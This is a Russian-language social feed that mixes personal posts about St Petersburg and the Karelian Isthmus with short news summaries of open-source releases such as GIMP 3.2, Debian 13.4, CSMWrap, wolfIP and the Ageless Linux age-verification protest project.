Хм, а по Неве пошёл лёд. С утра ещё смотрел, ничего не было.
Интересно, это ещё не ладожский?

#СПб

Выпуск свободной игры SuperTux 0.7.0

Среди изменений в новом выпуске:

• Добавлены новые спрайты и реализованы такие возможности, как скольжение по склонам, ползание, прыжки на попе и катящиеся камни.
• Переделана графика большинства фонов, объектов и врагов.
• Полностью переработаны уровни Story Mode, Revenge in Redmond и Bonus Island I.
• Добавлены новые неигровые персонажи (например, Granito) и враги (например, DiveMine, Fish и Corrupted Granito), а также переработаны многие ранее существовавшие враги: GoldBomb, Igel, Ghoul, Yeti и Ghost Tree.
• Добавлена новая музыка.
• Переработан редактор уровней.
• Добавлен режим локальной многопользовательской игры.
• Предложены новые элементы геймплея: сверкающие враги, ключи, карман для предметов и разблокируемые через Tux Dolls бонусные острова.
• Проведён рефакторинг кода и осуществлён переход на обвязку SimpleSquirrel для использования скриптового языка Squirrel.
• Возвращена поддержка платформы Android и добавлены пакеты в формате Flatpak.

@ivanhead А по мне - так обычный беспредел. Просто очень неожиданно возникла "какая-то инфекция", как раз перед запуском онвамнедимоновского свечного заводика.
Просто беспредел уже настолько немудрёный, что аж диву даёшься, как народ всё это хавает.
Как пел Слепаков "И не заметить уже невозможно моих двух-ходовых схем."

Увеличение длительности суток составляет 1,33 миллисекунды в столетие — это наиболее высокий темп за последние 3,6 млн лет.

Выпуск CSMWrap 3.0, прослойки для загрузки в режиме BIOS на системах с UEFI

Проектом предоставляются 64- и 32-разрядные сборки EFI-приложения, которые достаточно разместить в каталоге /EFI/BOOT/ в разделе с ФС FAT на носителе с операционной системой, способной загружаться только в окружениях с BIOS. UEFI-прошивка распознает подобный носитель и покажет в числе загрузочных устройств. На загружаемом устройстве желательно использовать таблицы разделов в формате MBR.

В ветке CSMWrap 3.0 добавлена поддержка файла конфигурации csmwrap.ini, который можно разместить в одном каталоге с исполняемым файлом EFI для указания дополнительных настроек. Реализована возможность указания в файле конфигурации параметров последовательного порта для отладочного вывода, пути к альтернативному VGABIOS (вместо SeaVGABIOS), PCI-адреса видеокарты, флагов для отключения IOMMU и подавления вывода на экран информации о работе CSMWrap, показываемой помимо баннера и сообщений о сбоях.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64998

Открытый радар AERIS-10, способный отслеживать объекты на расстоянии до 20 км

Подготовлено два варианта радиолокационной станции на фазированных антенных решётках - AERIS-10N (Nexus) и AERIS-10E (Extended). Оба варианта используют частоту 10.5 ГГц и используют импульсную линейную частотную модуляцию (LFM). Отличия сводятся к использованию массива плоскостных антенн 8x16 и массива щелевых излучателей в диэлектрически заполненном волноводе 32x16, обеспечивающих дальность действия до 3 км и 20 км, соответственно, а также мощности сигнала (1Wx16 и 10Wx16).

Система модульная с раздельными платами управления питанием, генерации частот и RF-блоками. Для обработки сигналов, сжатия импульсов, вычисления скорости объекта при помощи доплеровского быстрого преобразования Фурье, исключения неподвижных объектов (MTI) и обеспечения постоянного уровня ложных тревог (CFAR) задействован FPGA XC7A100T. Вращение антены на 360° обеспечивает шаговых двигатель. Управление работой и настройка периферийных устройств осуществляется при помощи микроконтроллера STM32F746xx.

Корректировка положения и ориентации в режиме реального времени обеспечивается при помощи GPS и инерциальных датчиков (акселерометр, гироскоп). Реализовано электронное управление сканирующим лучом в пределах ±45° по высоте и азимуту. Возможно одновременное отслеживание движения нескольких объектов. Для управления радаром, наглядного отслеживания движущихся объектов и их сопоставления с картой реализован графический интерфейс.

Сборка радара осуществляется из типовых элементов, имеющихся в широкой продаже. Затраты на чипы и компоненты для изготовления радара в простейшей конфигурации оценивается приблизительно в 5000 долларов. Для сравнения стоимость коммерческих радаров того же класса начинается с 250 тысяч долларов.

Выпуск CSMWrap 3.0, прослойки для загрузки в режиме BIOS на системах с UEFI

Проектом предоставляются 64- и 32-разрядные сборки EFI-приложения, которые достаточно разместить в каталоге /EFI/BOOT/ в разделе с ФС FAT на носителе с операционной системой, способной загружаться только в окружениях с BIOS. UEFI-прошивка распознает подобный носитель и покажет в числе загрузочных устройств. На загружаемом устройстве желательно использовать таблицы разделов в формате MBR.

В ветке CSMWrap 3.0 добавлена поддержка файла конфигурации csmwrap.ini, который можно разместить в одном каталоге с исполняемым файлом EFI для указания дополнительных настроек. Реализована возможность указания в файле конфигурации параметров последовательного порта для отладочного вывода, пути к альтернативному VGABIOS (вместо SeaVGABIOS), PCI-адреса видеокарты, флагов для отключения IOMMU и подавления вывода на экран информации о работе CSMWrap, показываемой помимо баннера и сообщений о сбоях.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64998

The "rewrite it in rust" has been replaced by the "rewrite it with Claude™".

приличного человека можно узнать по трём смартфонам:
- для улицы
- для дома
- для мессенджера max

Выпуск River 0.4.0 с разделением композитного и оконного менеджеров

River может выполняться как во вложенных сеансах, запущенных поверх других X11- и Wayland-серверов, так и без прослоек, используя для вывода драйверы KMS/DRM. Для разделения функциональности композитного и оконного менеджеров проектом развивается Wayland-протокол river-window-management-v1. В оконный менеджер выносятся такие функции, как декорирование окон, управление фокусом ввода, указателем, клавиатурными комбинациями, позицией и размером окон.

Возможна замена оконных менеджеров на лету, без прерывания сеанса. На выбор предлагается 16 оконных менеджеров, совместимых с River, среди которых имеются оконные менеджеры мозаичные в стиле DWM или xmonad, Emacs-подобные в стиле EXWM, классические стековые и на основе прокручиваемой ленты. Для запуска X11-приложений поддерживается использование Xwayland.

Среди причин разделения композитного и оконного менеджеров упоминается: снижение порога для написания оконных менеджеров; возможность реализации оконных менеджеров на высокоуровневых языках со сборкой мусора, не влияющих на производительность композитного менеджера; возможность горячей замены оконных менеджеров без перезапуска композитного сервера и запущенных графических программ; упрощение проведение экспериментов, связанных с дизайном оконных менеджеров.

Из ограничений протокола river-window-management-v1 отмечается отсутствие функциональности, выходящей за рамки 2D-операций с рабочим столом, например, не поддерживается создание сложных эффектов и 3D-интерфейсов для систем виртуальной реальности. Эффекты пока ограничиваются простой анимацией, но в будущем планируется реализация более сложных эффектов при помощи шейдеров.

Выпуск мультимодельного IPTV-оркестратора IP_TV-Neon 0.8.2

Основные изменения: ​

• К существующей интеграции с DeepSeek добавлена поддержка Google Gemini, что позволяет пользователю выбирать предпочтительный движок для семантического поиска и формирования динамических плейлистов на основе естественного языка.
• Реализован механизм интеллектуальной фильтрации. Система способна обрабатывать запросы вида "найди научно-популярные каналы с английской звуковой дорожкой" или "сформируй список телеканалов по рейтингу", анализируя метаданные из локальных или удалённых списков воспроизведения в формате M3U. ​

В городе снега почти нет, зато много машин, людей и песка. На севере перешейка снег лежит полосами. Кое-где он даже ещё замёрзший, по нему можно спокойно идти, дальше уже проваливаешься, а потом уже и глубокая лужа, покрытая некрепким ледком. Поднимаешься с дороги на холмы-мяки, проваливаясь в снег по колено, перескакиваешь через чьи-то траншеи и огневые точки, а вершина уже зелёная, и всё пространство, что охватывает глаз, зелёное, птицы поют песни весны. Прямо волшебная зелёная страна с висящими клоками уснеи и брусничными кочками. На картах точки вроде не обозначены, да и вряд ли они слишком высокие, думаю, метров 80. Но чуть спускаешься с одной, как видишь рядом ещё выше. На двух деревьях рядом кто-то соорудил деревянные ступени, но начинаются они не от самой земли, надо каким-то образом подпрыгнуть. Стоит особым образом вытесанный пень — то ли престол, то ли алтарь. Из окопов выглядывает осторожная белка. Идёшь дальше, за ней новая вершина. Потом ещё одна, самая высокая. Ориентир - огромная матёрая сосна, нескольким людям в обхват. А за ней... Как раз Искалеченные Земли. Глядишь вниз, и почти сколько хватает глаз, полосы снега и песка, с пеньками спиленных деревьев, дорожная колея. Вдалеке - непонятно почему пощажённые островки соснового леса.

#ЛенинградНутряной

(#monochromemarch)

В городе снега почти нет, зато много машин, людей и песка. На севере перешейка снег лежит полосами. Кое-где он даже ещё замёрзший, по нему можно спокойно идти, дальше уже проваливаешься, а потом уже и глубокая лужа, покрытая некрепким ледком. Поднимаешься с дороги на холмы-мяки, проваливаясь в снег по колено, перескакиваешь через чьи-то траншеи и огневые точки, а вершина уже зелёная, и всё пространство, что охватывает глаз, зелёное, птицы поют песни весны. Прямо волшебная зелёная страна с висящими клоками уснеи и брусничными кочками. На картах точки вроде не обозначены, да и вряд ли они слишком высокие, думаю, метров 80. Но чуть спускаешься с одной, как видишь рядом ещё выше. На двух деревьях рядом кто-то соорудил деревянные ступени, но начинаются они не от самой земли, надо каким-то образом подпрыгнуть. Стоит особым образом вытесанный пень — то ли престол, то ли алтарь. Из окопов выглядывает осторожная белка. Идёшь дальше, за ней новая вершина. Потом ещё одна, самая высокая. Ориентир - огромная матёрая сосна, нескольким людям в обхват. А за ней... Как раз Искалеченные Земли. Глядишь вниз, и почти сколько хватает глаз, полосы снега и песка, с пеньками спиленных деревьев, дорожная колея. Вдалеке - непонятно почему пощажённые островки соснового леса.

#ЛенинградНутряной

(#monochromemarch)

Russian government wants to ban Telegram because Ukrainians are recruiting Russians for terrorist attacks.

Ukrainian government wants to ban Telegram because Russians are recruiting Ukrainians for terrorist attacks.

:acat_loading:

Представляю свои страницы про Delta Chat. Я постарался покрыть все популярные вопросы, не перегружая лишней информацией. Учтены актуальные разработки, так как последние месяцы было добавлено много чего интересного, и другие руководства уже устарели.

software/delta-chat: Подробная информация о функциях и возможностях, технические детали и ответы на вопросы.

guides/delta-chat: Простое руководство по использованию и введение в основные функции.

guides/delta-chat-email: Использование с классической электронной почтой для продвинутых пользователей.

Я проделал много работы. Надеюсь, вам понравятся эти страницы и сам Delta Chat. Как всегда принимаются любые предложения и исправления.

@shuro @dlmk слышал теорию заговора, что украинские спецслужбы просочились в спецслужбы российские и специально заставляют Россию делать больше и больше блокировок, отрезаяя её от глобального мира

Создан дистрибутив Ageleless Linux для противодействия законам о проверке возраста

Для установки предлагается скрипт become-ageless.sh, позволяющий сконвертировать любой уже установленный Debian GNU/Linux в Ageleless Linux. Скрипт заменяет файл /etc/os-release и включает в него информацию о несоблюдении законов о проверке возраста (COMPLIANCE_STATUS="refused", API_STATUS="refused", VERIFICATION_STATUS="flagrantly noncompliant"), добавляет каталог /etc/ageless/ с отчётами о нарушаемых законах и реализует прототип фиктивного API для выдачи приложениям информации о возрасте пользователей. Реализация API сводится к скрипту /etc/ageless/age-verification-api.sh, который на все запросы выдаёт ошибку "ERROR: Age data not available" с примечанием, что все пользователи в системе имеют неопределённый возраст.

По мере реализации механизмов проверки возраста в дистрибутивах, скрипт намерены расширять средствами для удаления или блокирования подобных механизмов в различных дистрибутивах. Например, в случае реализации D-Bus интерфейса "org.freedesktop.AgeVerification1" в Fedora Linux, скрипт будет адаптирован для применения в Fedora для удаления обработчика, реализующего данный интерфейс, или предоставления пакетов в альтернативным обработчиком, возвращающим неопределённый возраст. Аналогично, в случае появления запроса возраста в инсталляторе Ubuntu, скрипт будет расширен для удаления данного запроса, а если Debian интегрирует в сервис AccountsService передачу информации о возрасте, проект Ageleless Linux возьмёт на себя поддержание изменённого форка AccountsService.

Принятые или находящиеся на стадии утверждения законы, предписывающие реализацию проверки возраста, не запрещают распространение операционных систем без подтверждения возраста, но предусматривают штрафы к поставщикам, ответственным за разработку, лицензирование или установку подобных операционной системы. После запуска скрипта от проекта Ageleless Linux пользователь принимает на себя роль "поставщика операционной системы". Предполагается, что если ребёнок воспользуется компьютером с Ageleless Linux, установивший данный дистрибутив пользователь может рассматриваться как поставщик, предоставивший операционную систему ребёнку без указания его возраста во время создания учётной записи. При этом педполагается, что в подобной ситуации нет пострадавших детей, а есть лишь лица, чей возраст неизвестен.

Проект также намерен распространять устройства на базе платформы Milk-V Duo S, удовлетворяющие предписаниям Закона Калифорнии AB1043, но намеренно не выполняющие его требования. Также планируется запустить каталог приложений store.agelesslinux.org, через который предоставить возможность установки распространяемых устройствах среды обучения языку Python, текстового редактора, игры "Змейка", IRC-клиента с предупреждением об опасности общения с незнакомыми людьми и 8-строчный скрипт "peepee", выводящий на экран слово "peepee" (предполагается, что за установку подобного скрипта без верификации возраста можно получить штраф).

Создатели Ageleless Linux пытаются продемонстрировать абсурдность вводимых законов проверки возраста, распространяя устройства с явным, документированным и преднамеренным нарушением закона AB1043, сулящего получение штрафа. В январе 2027 года подобные устройства планируют раздавать детям на школьных ярмарках и библиотечных мероприятиях. Отмечается, что получение штрафа лучше всяких обсуждений раскроет суть витиеватых формулировок в законе и позволит понять, подпадает ли изменяющий систему bash-скрипт под определение "поставщик операционной системы", считается ли специализированная плата "устройством общего назначения" и можно ли наложить штрафы за "каждого пострадавшего ребёнка" в случае отсутствия возможности посчитать пострадавших детей.

По мнению автора проекта, принимаемые законы о проверке возраста являются скорее защитным барьером и созданием инфраструктуры слежки, чем заботой о безопасности детей. Предъявляемым законом требованиям уже соответствуют крупнейшие производители, такие как Apple, Google и Microsoft, но при этом законы могут привести к неподъёмным издержкам у небольших производителей ОС и проектов, развиваемых энтузиастами. Во многих случаях не реализовавшим требования проверки возраста проектам проще отказаться от распространения в юрисдикциях с подобными законами, так как затраты на юридическую защиту превысят годовой бюджет большинства открытых проектов.

Напомним, что в ряде штатов США продвигаются законопроекты, предписывающие добавление в операционные системы возможности для указания возраста пользователя на этапе регистрации учётной записи и предоставления приложениям программного интерфейса для определения возрастной группы текущего пользователя (младше 13 лет, от 13 до 16 лет, от 16 до 18 лет, 18 лет и старше) для соблюдения законодательства о защите детей в интернете. За невыполнение требований предусмотрены штрафы до $2500 за неумышленное и до $7500 за умышленное нарушение в отношении каждого пострадавшего ребёнка.

Добавление API для запроса приложениями информации о возрасте пользователя уже обсуждается разработчиками дистрибутивов Ubuntu, Debian, Fedora, Linux Mint и NixOS. Конкретные решения ещё не приняты, но рассматривается возможность реализации необходимого API через xdg-desktop-portal или сервис AccountsService с отправкой запросов через новый D-Bus интерфейс "org.freedesktop.AgeVerification1". Руководитель компании System76, разрабатывающей дистрибутив Pop!_OS, пообщался с сенатором штата Колорадо, являющимся соавтором законопроекта о проверке возраста, который предложил подготовить поправки к законопроекту для исключения открытого ПО из области его действия.

Проект MidnightBSD добавил на страницу загрузки предупреждение о запрете использования MidnightBSD жителям штата Калифорния с 1 января 2027 года и Бразилии с 17 марта 2026 года из-за вступления в силу законов о верификации возраста. В случае утверждения законопроектов запрет также распространится на штаты Колорадо, Иллинойс и Нью-Йорк. Утверждается, что разработчики MidnightBSD планируют выполнить требования законов Калифорнии, Колорадо и Иллинойса, но не станут пытаться соответствовать требованиям законов Бразилии и Нью-Йорка, так как MidnightBSD не является коммерческой компанией и не имеет средств для оплаты сервисов верификации.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64995

@bifik цензура стала ломать api.telegram.org, соединения отваливаются по таймауту через раз.

Пока может помочь настроить таймаут и ретраи побольше, если код позволяет. Потом, наверное, совсем убьют и придётся проксировать.

По новым схемам, электричка в сторону, например, Зеленогорска на одинаковое расстояние стоит раз в пять меньше чем на приозерском направлении. Сегодня еду и вижу, что народу явно поубавилось. Заставляет задуматься!
Ну и каждый раз стыдно платить за билет, понятно же, что моя копеечка пойдёт каким-нибудь проходимцам и в итоге вообще где-нибудь пропадёт, но точно не на улучшение поездки.

Релиз графического редактора GIMP 3.2.0

Среди наиболее значимых улучшений в GIMP 3.2:

• Добавлена поддержка слоёв-ссылок (Link layer), позволяющих прикрепить внешние файлы с изображениями в качестве отдельных слоёв. В GIMP к слоям-ссылкам применяется режим недеструктивного редактирования, т.е. манипуляции со слоями-ссылками не влияют на состояние привязанных исходных изображений.

  Например, если добавить SVG-файл как слой-ссылку, то после редактирования этого файла в векторном графическом редакторе Inkscape, содержимое слоя в GIMP будет автоматически синхронизировано с состоянием отредактированного файла. При этом если в GIMP отмасштабировать или повернуть содержимое слоя-ссылки, то данные изменения не повлияют на качество исходного изображения.

  В будущем планируют добавить возможность привязки не только целых изображений, но отдельных слоёв, т.е. как слои-ссылки можно будет привязать выбранные слои из отдельного XCF-файла.
  
  

• Добавлена поддержка векторных слоёв (Vector layer), позволяющих создавать фигуры с заданными свойствами заливки и обводки. Данные хранятся в векторном виде, что позволяет в любой момент изменить контуры фигур (path), выбрать другой цвет заливки или обводки и применить к слою инструменты трансформации в недеструктивном режиме. Для создания векторного слоя следует создать фигуру при помощи инструмента "Контуры" (Path) и нажать кнопку генерации векторного слоя для фигуры, после чего можно, например, повернуть или масштабировать векторный слой без потери качества исходной фигуры.
• Добавлена поддержка нового формата кистей, задействованного в программе для цифровой живописи MyPaint 2.0. Движок для работы с кистями MyPaint теперь учитывает масштаб и поворот холста при рисовании, что позволяет более точно симулировать реальные мазки кистью. В состав GIMP добавлено более 20 новых кистей из набора Dieterle, входящего в состав MyPaint Brushes 2, включая кисти для рисования стрелок и постеризации.
• Реализованы опции для отрисовки эскизов кистей, шрифтов и палитр с использованием цветов фона и переднего плана активной темы оформления. Например, при выборе тёмного режима оформления кисти теперь могут отображаться светлым цветом на тёмном фоне, а не только на белом фоне.
• В инструмент для работы с кистями MyPaint добавлен ползунок "Усиление" (Gain), при помощи которого можно управлять реагированием на степень нажатия при рисовании, например, для симуляции более сильного или слабого нажатия на кисть при рисовании мышью.
• Добавлена возможность недеструктивного применения фильтров к каналам, по аналогии с тем, как это уже реализовано для слоёв. В панели "Каналы" появился столбец Fx и доступна возможность редактирования, перегруппировки, удаления и объединения фильтров. Проведён рефакторинг реализации недеструктивного редактирования изображений, позволивший упростить дальнейшее расширение функциональности и сопровождение кода, а также избавиться от некоторых ошибок.
• В интерфейсе выбора цвета, соответствующего схеме CMYK (CMYK Color Selector), реализован расчёт покрытия чернил (Ink Coverage, количество чернил, наносимых на бумагу в одном месте). При подготовке изображения к печати данный параметр позволяет оценить превышение пороговых значений в системах печати (например, слишком большой Ink Coverage может привести к смазыванию или не подходить для используемого типа бумаги).
• Предложен новый режим смешивания при рисовании - "Overwrite", позволяющий напрямую заменять пиксели в области рисования без смешивания значений прозрачности кисти и существующих пикселей. Режим в основном предназначен для применения с инструментом "карандаш" и может использоваться для пиксельной графики, когда нужно добиться однородной непрозрачности, на которую не влияют уровни прозрачности исходной области.
• В инструмент для работы с текстом добавлена опция для управления направлением окантовки. Например, контур вокруг букв можно направлять внутрь, наружу или в обоих направлениях.
• Реализована возможность перемещения всплывающего окна редактора текста над холстом в любое место, не меняя расположение самой редактируемой области. Произведён рефакторинг кода, решивший проблемы с рендерингом текста при очень больших разрешениях. Добавлено сочетание клавиш для вставки неотформатированного текста из буфера обмена (по-умолчанию назначено на Shift + Ctrl + V) по аналогии с ранее добавленными сочетаниями клавиш для форматирования жирным шрифтом, курсивом и подчёркиванием.
  
  <iframe src="https://peer.tube/videos/embed/64DzkCtrEw9aDr88urpAnj">
• Добавлена дополнительная тема оформления "System Colors", при выборе которой цвета в интерфейсе автоматически подстраиваются под настройки активных системных тем в Linux и Windows, и обновляются при изменении системной темы.
• Добавлен GEGL Filter Browser, интерфейс для навигации по фильтрам на базе библиотеки GEGL (Generic Graphics Library). При помощи GEGL Filter Browser можно посмотреть список доступных операций GEGL (фильтров) и информацию по их использованию.
  
  
  
• В инструменте для создания и редактирования текстовых слоев реализована поддержка комбинаций клавиш "Ctrl + B", "Ctrl + I" и "Ctrl + U" для применения жирного начертания, курсива и подчёркивания. Обеспечено изменение цвета контура текста в реальном времени сразу после изменения цвета в окне выбора цвета, не дожидаясь подтверждения выбора.
• Представлен новый интерфейс плагина Animation Playback, оформленный в стиле видеоплееров, таких как VLC. Вместо индикатора прогресса задействован слайдер, позволяющий переместится на нужный кадр.
• Учтены системные настройки для отключения анимированных эффектов.
• В полях для ввода значений с размером в диалогах настройки сетки и разрешения монитора разрешено использовать математические выражения, например, "3 * 92cm".
• Внесены изменения для упрощения в будущем портирования на GTK4. Например, осуществлён уход от использования GtkTreeView в пользу GtkListBox.
• Добавлена возможность быстрого возврата к прошлому инструменту по сочетанию клавиш (по умолчанию назначено на Shift + X). Несмотря на то, что с технической точки зрения GIMP рассматривает применение фильтров (например, яркость-контаст) как применение инструментов (таких как вращение и кисть), в угоду интуитивности данное сочетание клавиш будет переключаться исключительно между состояниями, отображаемыми в интерфейсе в форме инструментов.
• Появилась возможность открывать множество изображений с помощью перетаскивания файлов на строку вкладок изображений.
• Добавлена возможность перетаскивания образцов цветов из истории применённых цветов. Ранее это не было возможным из-за смещения фокуса на кнопки соответствующего окна.
• Для 64-разрядных сборок GIMP с 1024 пикселей до 8192 пикселей увеличен максимальный размер временных кистей и шаблонов. Для 32-разрядных сборок ограничение не изменилось.
• Добавлена возможность загрузки преднастроек кривых и уровней, используемых в фильтрах Photoshop, и их использование в фильтрах GIMP.
• Обеспечено открытие любых форматов изображений, упакованных в архивы, сжатые алгоритмами, поддерживаемыми в GIMP (ранее такая поддержка была доступна для сжатых файлов в формата XCF).
• Добавлена поддержка загрузки RAW-изображений с камер, используя приложение ART (AnotherRawTherapee, форк RawTherapee).
• Добавлена поддержка экспорта палитры в формате kpl для использования в графическом редакторе Krita.
• Реализована возможность импорта анимированных изображений в формате APNG.
• Добавлена поддержка загрузки многослойных изображений в формате OpenEXR.
• Добавлена поддержка экспорта в формате JPEG 2000 (ранее поддерживался только импорт).
• Добавлена поддержка импорта и экспорта изображений и текстур в формате TIM, применявшемся в играх для приставки Sony Playstation 1.
• Добавлена поддержка импорта и экспорта изображений в формате OpenRaster, использующих расширения для запоминания выбранных и заблокированных слоёв.
• Добавлена поддержка формата OTA Bitmap (Over The Air Bitmap), использовавшегося для кодирования черно-белых изображений на старых телефонах Nokia.
• Добавлена поддержка импорта изображений в форматах AVCI (Advanced Video Coding), JIF (Jeff’s Image Format, расширенный вариант GIF), HRZ, PAA, PVR (PowerVR), SFW93A, SFW94A и HEJ2 (JPEG 2000 в контейнере HEIF), также импорта pat-файлов с шаблонами Photoshop.
• Добавлен новый плагин экспорта в формате SVG, позволяющий включать растровые слои в формате PNG или JPEG.
• Добавлена возможность экспорта векторных изображений в формате PDF.
• Расширена поддержка формата TIFF, для которого реализована возможность загрузки данных о видимости слоёв, режимов смешивания и тегов цветов.
• Добавлена поддержка экспорта изображений в формате PSB, используемом в Photoshop и отличающемся от формата PSD возможностью работы с очень крупными изображениями, разрешение которых превышает 30000 пикселей. При импорте PSD/PSB обеспечено распознание и конвертация применения недеструктивных фильтров Drop Shadow и Inner Shadow.

Выпуск дистрибутива Debian 13.4

Для загрузки и установки "с нуля" подготовлены установочные сборки c Debian 13.4. Системы, установленные ранее и поддерживаемые в актуальном состоянии, получают обновления, присутствующие в Debian 13.4, через штатную систему установки обновлений. Исправления проблем безопасности, включённые в новые выпуски Debian, доступны пользователям по мере выхода обновлений через сервис security.debian.org.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64992

Такие стоят погоды, что в городах просыпаются от спячки разные сущности, даже те, кто просыпаться и не должен. А люди стараются кучковаться в очередях в модные места и имеют склонность ходить по одним и тем же прямым маршрутам. От пыльных и запруженных вылезшим на солнце народом Петроградки выбрались — без карты и намерения — к уединенному военно-морскому бункеру у разорённой церкви. С вершины с нерастаявшим ещё снегом видна чапыгинская телебашня на Чапыгина, куда я ребёнком отправлял письма Хохе.
!

PS С новым 7535 (или 7534?) годом, кстати!

(#ленинграднутряной)

Проходили мимо Ботсада - просто огроменная очередь, кто все эти люди и зачем они туда стоят? Забавно, что рулит очередью престарелый чоповец с эмблемой в*гнера на кепочке.

wolfIP и passt - легковесные стеки TCP/IP, работающие без динамического выделения памяти

Проект может использоваться в качестве работающего в пользовательском пространстве TCP/IP-стека, подменяющего сетевой стек Linux, FreeBSD и macOS, а также пригодного для применения во встраиваемых системах на базе FreeRTOS, SafeRTOS, Zephyr, Azure RTOS ThreadX, NuttX, RTEMS, VxWorks и QNX. Помимо этог на базе wolfIP могут создаваться самодостаточные сетевые приложения, запускаемые поверх оборудования (bare-metal). В сочетании с библиотекой wolfSSL предоставляется поддержка TLS 1.3, что позволяет создавать компактные встраиваемые системы, поддерживающие HTTPS.

Основные особенности wolfIP:

• Использование предварительно выделенных в статической памяти буферов при обработке сетевых пакетов. Вызовы malloc и free не используются.
• Поддержка API BSD-сокетов в неблокирующем и блокирующем режиме.
• Компактный размер (4200 строк кода, в 4 раза меньше TCP/IP стека lwIP).
• Возможность использования вместо штатных системных сетевых стеков на POSIX-системах.
• Возможность использования сетевого интерфейса TAP для тестирования работы без оборудования.
• Поддержка сетевых интерфейсов STM32 Ethernet.
• Разработка с оглядкой на системы с повышенными требованиями к безопасности: Детерминированная и воспроизводимая конфигурация. Модель развёртывания, обеспечивающая безопасность (Secure-by-default). Изоляция между компонентами. Поддержка безопасного обновления версий. Длительное сопровождение.
• Учёт требований к высоконадёжным системам: отсутствие динамического выделения ресурсов, фиксированные пулы памяти, контролируемое использование ресурсов, предсказуемое поведение, упрощённая архитектура, поддержка генерации артефактов для верификации.
• Реализация IPv4, UDP, TCP, IPSEC, ARP, ICMP, DHCP-клиента, DNS-клиента и HTTP/HTTPS-сервера. Поддержка RFC 7323 (TCP Timestamps, RTT measurement, PAWS, Window Scaling) и MSS (Maximum Segment Size), RTO (Retransmission timeout), SACK (Selective Acknowledgment) в реализации TCP. Несколько алгоритмов контроля перегрузки (congestion control).

Из ограничений wolfIP отмечается возможность использования wolfIP только в роли конечного узла, способного принимать и устанавливать соединения, но не поддерживающего маршрутизацию трафика между сетевыми интерфейсами.

В дополнение можно отметить активное развитие сотрудником Red Hat похожего TCP/IP стека passt, работающего в пользовательском пространстве и не использующем динамическое выделение памяти. Проект passt развивается для организации канала связи между хост-окружением и гостевыми системами в QEMU в качестве более безопасной замены libslirp. Код passt написан на языке Си, насчитывает около 5000 строк и распространяется под лицензией GPLv2+.

Из особенностей passt можно отметить: поддержка IPv6 помимо IPv4, оптимизации на базе инструкций AVX2, защита от synflood, встроенная поддержка QEMU, libvirt и Podman, пакеты для всех популярных дистрибутивов, сервис ARP proxy, минималистичные серверы DHCPD, DHCPv6 и NDP, seccomp-профиль для блокирования всех неиспользуемых системных вызовов, поддержка NAT, возможность использования в качестве прозрачной замены slirp4netns.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64989

wolfIP и passt - легковесные стеки TCP/IP, работающие без динамического выделения памяти

Проект может использоваться в качестве работающего в пользовательском пространстве TCP/IP-стека, подменяющего сетевой стек Linux, FreeBSD и macOS, а также пригодного для применения во встраиваемых системах на базе FreeRTOS, SafeRTOS, Zephyr, Azure RTOS ThreadX, NuttX, RTEMS, VxWorks и QNX. Помимо этог на базе wolfIP могут создаваться самодостаточные сетевые приложения, запускаемые поверх оборудования (bare-metal). В сочетании с библиотекой wolfSSL предоставляется поддержка TLS 1.3, что позволяет создавать компактные встраиваемые системы, поддерживающие HTTPS.

Основные особенности wolfIP:

• Использование предварительно выделенных в статической памяти буферов при обработке сетевых пакетов. Вызовы malloc и free не используются.
• Поддержка API BSD-сокетов в неблокирующем и блокирующем режиме.
• Компактный размер (4200 строк кода, в 4 раза меньше TCP/IP стека lwIP).
• Возможность использования вместо штатных системных сетевых стеков на POSIX-системах.
• Возможность использования сетевого интерфейса TAP для тестирования работы без оборудования.
• Поддержка сетевых интерфейсов STM32 Ethernet.
• Разработка с оглядкой на системы с повышенными требованиями к безопасности: Детерминированная и воспроизводимая конфигурация. Модель развёртывания, обеспечивающая безопасность (Secure-by-default). Изоляция между компонентами. Поддержка безопасного обновления версий. Длительное сопровождение.
• Учёт требований к высоконадёжным системам: отсутствие динамического выделения ресурсов, фиксированные пулы памяти, контролируемое использование ресурсов, предсказуемое поведение, упрощённая архитектура, поддержка генерации артефактов для верификации.
• Реализация IPv4, UDP, TCP, IPSEC, ARP, ICMP, DHCP-клиента, DNS-клиента и HTTP/HTTPS-сервера. Поддержка RFC 7323 (TCP Timestamps, RTT measurement, PAWS, Window Scaling) и MSS (Maximum Segment Size), RTO (Retransmission timeout), SACK (Selective Acknowledgment) в реализации TCP. Несколько алгоритмов контроля перегрузки (congestion control).

Из ограничений wolfIP отмечается возможность использования wolfIP только в роли конечного узла, способного принимать и устанавливать соединения, но не поддерживающего маршрутизацию трафика между сетевыми интерфейсами.

В дополнение можно отметить активное развитие сотрудником Red Hat похожего TCP/IP стека passt, работающего в пользовательском пространстве и не использующем динамическое выделение памяти. Проект passt развивается для организации канала связи между хост-окружением и гостевыми системами в QEMU в качестве более безопасной замены libslirp. Код passt написан на языке Си, насчитывает около 5000 строк и распространяется под лицензией GPLv2+.

Из особенностей passt можно отметить: поддержка IPv6 помимо IPv4, оптимизации на базе инструкций AVX2, защита от synflood, встроенная поддержка QEMU, libvirt и Podman, пакеты для всех популярных дистрибутивов, сервис ARP proxy, минималистичные серверы DHCPD, DHCPv6 и NDP, seccomp-профиль для блокирования всех неиспользуемых системных вызовов, поддержка NAT, возможность использования в качестве прозрачной замены slirp4netns.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64989

Проект TUI Studio развивает визуальную среду для проектирования консольных интерфейсов

Проект написан на TypeScript c использованием React, Vite, Zustand, Tailwind CSS и Lucide React. Код распространяется под лицензией MIT. Из особенностей разработки отмечается, что почти весь код TUI Studio написан AI-ассистентом Claude.

В TUI Studio предоставляется более 20 готовых компонентов для формирования интерфейса (кнопки, меню, таблицы, списки, индикатор прогресса, диалоги, всплывающие подсказки и т.п.) и поддерживается 8 тем оформления, а также светлый и тёмный режим, градиентные заливки, ASCII-цвета и акцентные цвета. Имеется возможность отката изменений. Доступен интерфейс для создания своих компонентов. Проекты сохраняются в формате JSON.

Выпуск MouseControl 1.0, открытой альтернативы Logitech Options+

В качестве причины разработки открытой альтернативы отмечается недовольство низкой стабильностью работы Logitech Options+ (например, последний выпуск стал потреблять 40-60% ресурсов CPU на устройствах Intel Macbook Pro) и желанием избавиться от отправки телеметрии, привязки к облачному сервису Logitech и необходимости регистрироваться на сайте Logitech.

Среди возможностей MouseControl:

• Ремапинг всех 6 программно настраиваемых кнопок мыши;
